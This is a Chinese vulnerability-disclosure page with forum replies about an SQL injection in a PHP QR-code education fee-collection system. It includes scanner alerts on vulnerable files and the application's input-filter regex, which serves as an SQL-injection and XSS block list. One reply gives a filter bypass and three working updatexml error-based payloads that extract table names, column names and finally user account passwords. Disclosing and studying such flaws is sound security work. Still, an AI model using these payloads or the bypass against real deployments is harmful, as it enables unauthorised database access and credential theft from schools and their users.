高 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
php简易扫码付教育收费系统 php简易扫码付教育收费系统 1.0
php简易扫码付教育收费系统是一个以Php+MySql进行开发的查询与收费软件。
php简易扫码付教育收费系统in***.php存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
暂无
2020.5.12
官方悬赏
该漏洞具体细节
在论坛【悬赏细节】版面对于本漏洞进行漏洞分析
3 酒币
待解决
#2
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/index.php:1:2895 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? conntable(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5068 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? ig(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5122 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? se(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5169 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/doajax.php:1:497 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/doedit.php:1:631 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/douser.php:1:4936 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/duajax.php:1:293 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/index.php:1:425 is probably vulnerable.(Trace Graph at )**
#3
这是哪个工具扫描的结果?
#4
当然是我自己写的啊-.-
#5
强强强
$tw参数
//get拦截规则
$getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)|UPDATE\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\\(.+\\)|\\s+?.+?\\s+?|(`|'|\").*?(`|'|\"))FROM(\\(.+\\)|\\s+?.+?|(`|'|\").*?(`|'|\"))|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
在select后加入+符号进行绕过,构造payload:1111'or updatexml(1,concat(0x02,(select+ group_concat(table_name) from information_schema.tables where table_schema='phppay'),0x02),1)-- +
sql语句成功执行,获得数据库的表名
同理,构造payload:1111'or updatexml(1,concat(0x02,(select+ group_concat(column_name) from information_schema.columns where table_name='user' and table_schema='phppay'),0x02),1)-- +
sql语句成功执行,获得user表的列名
同理,构造payload:1111'or updatexml(1,concat(0x02,(select+ group_concat(wi,0x02,password) from phppay.user limit 0,1),0x02),1)-- +
sql语句成功执行,获得user表的账号密码
结束